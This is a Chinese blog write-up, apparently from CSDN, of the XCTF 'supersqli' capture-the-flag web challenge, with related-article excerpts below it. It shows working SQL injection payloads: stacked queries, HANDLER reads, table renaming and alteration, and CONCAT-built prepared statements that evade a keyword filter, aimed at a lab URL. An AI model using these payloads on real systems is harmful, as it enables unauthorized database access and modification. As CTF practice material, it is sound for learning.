XCTF-supersqli

最新推荐文章于 2023-10-10 17:26:17 发布
最新推荐文章于 2023-10-10 17:26:17 发布
阅读量172 收藏
点赞数
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/rickro/article/details/111722029
版权

XCTF-supersqli

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tk4WOsvB-1608952383077)(C:\Users\LOSEYOURSELF\AppData\Roaming\Typora\typora-user-images\image-20201226095721763.png)]

报错测试

error 1064 : You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ‘‘1’’’ at line 1

分析可得属于单引号注入

爆库名

union select schema_name from information_schema.schemata

return preg_match("/select|update|delete|drop|insert|where|\./i",$inject);

发现以上函数被过滤

尝试堆叠注入

1';show tables;#

出现两个表

查询表的字段

desc `1919810931114514`
desc `words`

在这里插入图片描述

在这里插入图片描述

handler函数

发现flag在第一个表的第一行,于是想到了handler函数

handler函数用法https://xz.aliyun.com/t/7169#toc-47

http://220.249.52.134:34710/?inject=1';handler `1919810931114514` open;handler `1919810931114514` read first;#

在这里插入图片描述

得到了flag。。

其他解法

之后又再网上找了找其他方法

法1:xctf官方的wp:根据两个表的情况结合实际查询出结果的情况判断出words是默认查询的表,因为查询出的结果是一个数字加一个字符串,words表结构是id和data,传入的inject参数也就是赋值给了id,所以我们可以采用修改表结构的方法来得到flag 将words表名改为words1,再将数字名表改为words,这样数字名表就是默认查询的表了,但是它少了一个id列,可以将flag字段改为id,或者添加id字段

1';rename tables `words` to `words1`;rename tables `1919810931114514` to `words`; alter table `words` change `flag` `id` varchar(100);#

法2 预编译

1';set @sql = CONCAT('Sele','ct * from `1919810931114514`;');Prepare stmt from @sql;EXECUTE stmt;#

e。。貌似有点难度,,
那么今天的wp就到这里了。

rickro
关注
xctf-supersqli
wh1sper、的博客
09-24 357
xctf-supersqli 堆叠注入一、堆叠注入 本次采用的靶场xctfsupersqli 一、堆叠注入 进入靶场,发现一个提示框。先随便点一下提交,发现输出了些东西·。 输入1’,判断存在注入点。 分别输如1=1,1=2,判断为单引号注入。 1' and 1= 1%23 1' and 1= 2%23 判断字段数,得到字段数为2。 1' order by 2%23 判断数据库,但发现使用了正则过滤了关键字select|update|delete|drop|insert|where
mysql练习(一)
CloserSide的博客
09-13 437
mysql练习一、例子二、约束 一、例子 例1: create table a( name varchar(10) ); 例2: create table b( name varchar(10), height decimal(5,2) ); 例3:创建表c create table c( id int, name varchar(20), age tinyint UNSIGNED ); 例4:往表C中插入一条记录。 insert into c values (0,'王五'
XCTF-攻防世界CTF平台-Web类——14、supersqli(SQL注入、关键词过滤)
Onlyone_1314的博客
11-27 2101
目录标题方法一、堆叠注入1、rename修改表名和alter change修改列名2、rename修改表名和alter add添加列名方法二、handler语句方法三、预编译 打开题目地址 之后搜索:1’ or 1=1# 成功返回了3条数据,说明存在SQL注入漏洞 之后先判断有几列数据,使用order by 1让返回的数据按照第一列排序: 1' or 1=1 order by 1 # 返回了正确的结果,并且按照第一列排序了,说明至少存在一列数据。 其实我们也可以直接从order by 2让返回的数据
攻防世界XCTFsupersqli
末初的CSDN博客
03-13 2398
加个单引号发现报错 比较烦的就是过滤了select 这样就无法进行查数据了,而且这里的/i就是忽略了大小写。无法进行大小写过滤 首先可以通过报错函数,把数据库给注入出来 -1' and extractvalue(1,concat(1,version()))-- + 版本信息:.18-MariaDB 数据库名称:supersqli 然后经过测试发现这里可以执行多条语句,也就是堆叠注入...
Xctf练习sql注入--supersqli
weixin_45694388的博客
12-28 302
三种方法 方法一 =1 回显正常 =1’回显不正常,报sql语法错误 =1’ --+ 回显正常,说明有sql注入点,应该是字符型注入(# 不能用) =1’ order by 3 --+ 回显失败,说明有2个注入点 =1’ union select 1,2 --+ 回显显示过滤语句: =1’; show databases --+ 爆数据库名 =-1’; show tables --+ 绕过过滤,显示表下的列名 =1’;show columns from words --+ 尝试堆叠
XCTF题目 supersqli 的做题思路
daqiangdetianxia的博客
07-06 516
在输入框提交后浏览器自动进行URL编码。若在hackbar中,则需要手动进行URL编码。 尝试: 1’ – 显示结果 于是修改为 1’# 显示: 正常情况下输入 一: 1 二: 1' and 1=1 三: 1'and 1=2 若一、二、三都为真,则存在注入点。 经测试,存在注入点。 然后 通过order by测试一共有多少列。 经过测试,一共又两列。 然后输入1' union select database(),user() # 显示: 发现对selec
xctf supersqli
09-01
对于 xctf supersqli,它是一个供参与者练习 SQL 注入技巧的 CTF(Capture The Flag)比赛题目。CTF比赛是一种网络安全竞赛,旨在测试参与者在各种安全领域的技能。在 xctf supersqli 中,参与者需要利用 SQL 注入...
MySQL练习(一)
lory_li的博客
03-31 445
1.创建数据库demo: create database demo;2.创建表:use demo; CREATE TABLE user( id int UNSIGNED auto_increment, name VARCHAR(20) not null, age int(3) UNSIGNED not NULL )ENGINE=INNODB CHARSET=utf8;这里简单说一下engin...
mysql 从简单到复杂练习
09-07
mysql从简单到复杂,熟练练习文档中语句,可以应对大多数面试
mysql练习题一
热门推荐
小芳
02-22 1万+
mysql练习题
mysql练习
weixin_44056331的博客
01-07 219
今天从新下载了mysql,对着菜鸟教程里面的步骤操作了一次。 1.SELECT SELECT * FROM table_name; 2. SELECT DISTINCT SELECT DISTINCT column_name,column_name FROM table_name; 3. WHERE WHERE子句用于提取那些满足指定条件的记录 SELECT col...
mySQL 练习
qq_36487294的博客
10-23 289
增删改查的基本练习一 /*查询所有学生信息,返回所有字段*/ SELECT * FROM students; /*查询所有学生,返回学生的姓名、年龄、所在地*/ SELECT name,age,city FROM students; /*查询所有学生,返回学生的姓名、年龄在年龄的后边+岁)、所在地、国家(附加列,固定值为中国)*/ SELECT name,CONCAT(age,'岁') AS ag...
MySql练习(一)
weixin_45338578的博客
09-06 812
目录 一、第一题 二、第二题 一、第一题 1.创建test数据库 2.在test数据库中创建student表,表结构如下图所示(id设置为主键自增长) sql语句:create table student ( id int PRIMARY key auto_increment, name varchar(20), score INT, address VARCHAR(50), useremail VARCHAR(20)...
Mysql数据库基础练习
最新发布
Dream的博客
10-10 300
使用 between 关键字查询出staff_info表中age字段包含大于等于20小于等于22的内容。使用’%’通配符查询出staff_info表中staff_name字段内容等于’李’字开头的所有信息。使用’_’通配符查询出staff_info表中staff_name字段内容等于’李’字开头的所有信息。使用 in 关键字查询staff_info表中 age 字段中等于20和24的内容。查询staff_info表中staff_name字段内容等于李四的信息。查询当前数据库中的所有表。
mysql技能训练_Mysql 练习 总结
weixin_34734156的博客
01-20 171
insert into Course values ('9-888','高等数学','831');#---------------Teacher--添加信息----insert into Teacher values ('804','李成','男','1958-09-01','副教授','计算机系');insert into Teacher values ('856','张旭','男','1969...
MySQL数据库基础练习
清醒云思的博客
08-11 219
本文介绍了如何使用SQL语言创建和操作不同的数据表。首先,使用USE语句选择要使用的数据库,例如使用名为myschool的数据库。然后,使用CREATE TABLE语句创建各种表格,如学生表、课程表、成绩表和年级表。每个表格都包含了不同的列和数据类型,并设置了一些约束条件。文章还给出了每个表格的具体创建语句。
XCTF-Mobile新手入门挑战:解析‘你是谁’解题记录
资源摘要信息:"【XCTF-Mobile】新手练习区-11-你是谁.rar" 标题中“XCTF-Mobile”指的是一系列移动设备安全相关的CTF(Capture The Flag)竞赛,其中CTF是一项信息安全竞赛,旨在通过解决各种安全挑战来提高参赛者...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值